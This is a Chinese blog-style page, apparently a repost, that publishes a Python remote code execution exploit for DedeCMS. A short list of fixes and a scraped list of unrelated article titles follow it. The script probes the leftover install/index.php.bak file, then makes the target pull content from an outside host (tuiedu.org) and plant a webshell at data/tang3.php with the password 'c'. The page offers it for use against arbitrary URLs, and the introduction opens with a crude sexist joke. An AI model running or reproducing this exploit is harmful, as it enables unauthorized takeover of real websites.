python如何执行代码漏洞_织梦dedecms最新远程代码执行利用脚本(python)
织梦CMS漏洞,就好比女人的大姨妈,每个月不来上一次,这就算是内分泌失调。代码是用python写的,小伙伴们自行调试吧!在前段时间,织梦爆出了一个远程文件包含漏洞。呃,感谢hoseph同学提供的代码吧。写的很不错!修复此漏洞方法,请见文章底部。
#! /usr/bin/env python
#coding=utf-8
#Joseph(小续)
import requests
import sys
import re
def main():
try:
url="http://"+sys.argv[1].strip('http://')
except IndexError:
print '''
poc: dede.py [url]http://www.baidu.com/[/url]
'''
payload="/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/admin/config_update.php"
urlpoc=url+payload
code=requests.get(urlpoc).status_code
if code==200:
print u"恭喜存在此漏洞"
print u"Ongoing attacks--->>>>>"
exploit(url)
pass
else:
print u"sorry 漏洞正在挣扎"
pass
def exploit(url):
urlpoc=url+"/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/tang3.php&updateHost=https://www.tuiedu.org/"
htmlcontent=requests.get(urlpoc).content
Probe=re.compile(r'存在')
if Probe.findall(htmlcontent):
print u'''
ver:getshell成功
shell:url+/data/tang3.php?a=0 密码为:c
'''
pass
else:
print u"请看远程地址是否已经不可用"
pass
if __name__ == '__main__':
main()
修复方法:
1、建议安装完成后,删除(改名)install文件夹。
2、给data文件夹改名,或者移动位置。
3、到织梦后台,升级到最新的版本
4、官方网站下载最新补丁包手动更新到最新版本。
5、不用谢!
python如何执行代码漏洞_织梦dedecms最新远程代码执行利用脚本(python)相关推荐
- dedecms 漏洞_织梦dedecms文档内容页自动关联tag标签加入内链的方法_dedecms_CMS教程...
效果: 实现教程 1.后台-系统-核心设置-关键字替换,选择[是] 2.后台-系统-其他选项-关键词替换次数,填[1]或者[0] 1:表示文档内容里有多个关键词,只让1个是内链 0:表示文档内容里有多 ...
- rmi远程代码执行漏洞_微软 Windows DNS Server 远程代码执行漏洞
安全预警 漏洞:微软 Windows DNS Server 远程代码执行漏洞漏洞编号:CVE-2020-1350威胁程度:高影响范围: Windows Server 2008 for 32-bit S ...
- dede 表单必填_织梦dedecms自定义表单选项必填怎么修改
织梦dedecms自定义表单选项必填怎么修改? 本文实例讲述了织梦dedecms自定义表单选项必填修改解决方法.分享给大家供大家参考.具体方法如下: 推荐学习:织梦cms 方法一:首先我们要用一段ph ...
- 中 自动展示链接的内容_织梦DEDECMS文章内容中的图片自动添加ALT和title属性方法...
今天下载我资源网(www.xiazaiwo.net)要说的是织梦DEDECMS文章内容中的图片自动添加ALT和title属性,如果觉得不错,请分享给大家,也给大家做个参考.一起跟随小编过来看看吧! 织 ...
- dedecms右侧悬浮_织梦dedecms网站上添加漂浮广告
在织梦dedecms的网站上添加漂浮广告其实很简单,这篇文章主要讲的是在织梦网站首页添加漂浮广告. 我们用本地搭建的织梦默认模板演示. 1.准备一个广告图片 准备一个广告图片,命名为漂浮.gif ,设 ...
- ueditor如何去掉末尾的p标签_织梦dedecms如何去掉域名后面的index.html
织梦dedecms如何去掉域名后面的index.html 为什么要去掉导航链接里的index.html? 虽然说这两个链接的意思一样,链接到的网址也一样,但是从优化角度来说去掉链接里的index.ht ...
- 织梦网站调用变量失败_织梦dedecms无法调用新添加变量的解决办法
织梦dedecms无法调用新添加变量:在项目中使用了几次织梦cms程序,感觉越来越好用,以前刚接触dedecms时一看后台界面,如此之乱,使我心乱如麻,不知从何下手.后来因为工作逐渐就熟悉了它的后台. ...
- python更新织梦网站_织梦DEDECMS自动更新首页的办法
关键字描述:主页 办法 升级 自动   // 首页 < tureStFile 编码 各位好!,我是hacklei,自己玩DEDECMS時间不长, 才两个多月,DEDECMS ...
- u8 附件上传后存放路径_织梦DedeCms附件按月份保存的修改方法
正常情况下,dedecms织梦系统的图片附件是按日保存的,一天一个文件夹, 时间长了, 这样在allimg中就会生成很多文件夹, 不方便管理. 虽然,dedecms织梦的后台设置有"附件保存 ...
最新文章
- 树形结构在关系数据库中的设计
- C#使用ICSharpCode.SharpZipLib.dll压缩文件夹和文件
- 你可以不知道的JS二
- 理解TCP序列号(Sequence Number)和确认号(Acknowledgment Number)
- libevent中的时间及相关的管理
- 在Vue2.0项目中与H5项目中获取、设置、清除cookie的一些注意点
- Python矩阵处理库—Numpy库的基本使用
- 运用java语言提取数据库信息
- 哥尼斯堡的“七桥问题” (欧拉回路,并查集)
- SQL中的事物【转】
- kafka python教程_kafka python 指定分区消费
- chmod 777命令_Linux shell命令总结
- piap.excel 微软 时间戳转换mssql sql server文件时间戳转换unix 导入mysql
- Python 词云可视化【爆肝之作】
- Android5.1开机LOGO与开机动画
- 为什么比同龄人显老?原来基因变异在作怪
- Tivoli TSM产品功能详述
- 大数据面试常见问题(三)——Hadoop部分
- MATLAB - 拉普拉斯算子可视化
- 项目开发规范--前端
热门文章
- resnet论文_ResNet还是DenseNet?即插即用的DS涨点神器来了!
- r语言各形状编号_R语言入门第八讲:编码分类变量(factor)
- 打开网站太慢linux如何检查,seo优化中网站访问慢的检测方法
- maven 不编译jasper文件_第一个SpringBoot项目、核心配置文件properties(yml、yaml)、集成jsp...
- python循环变颜色_在Python中使用循环变量在matplotlib中指定颜色
- linux 修改时间的命令,Linux 常用命令(查看版本、修改系统时间)
- mysql什么级别数据库_Mysql的四种隔离级别是什么
- python决策树分类 导入数据集_python+sklearn实现决策树(分类树)
- java 鼠标单击_不通过鼠标点击,单纯的通过Java代码生成鼠标单击事件
- 【存储知识学习】第十章- NAS和SAN《大话存储》阅读笔记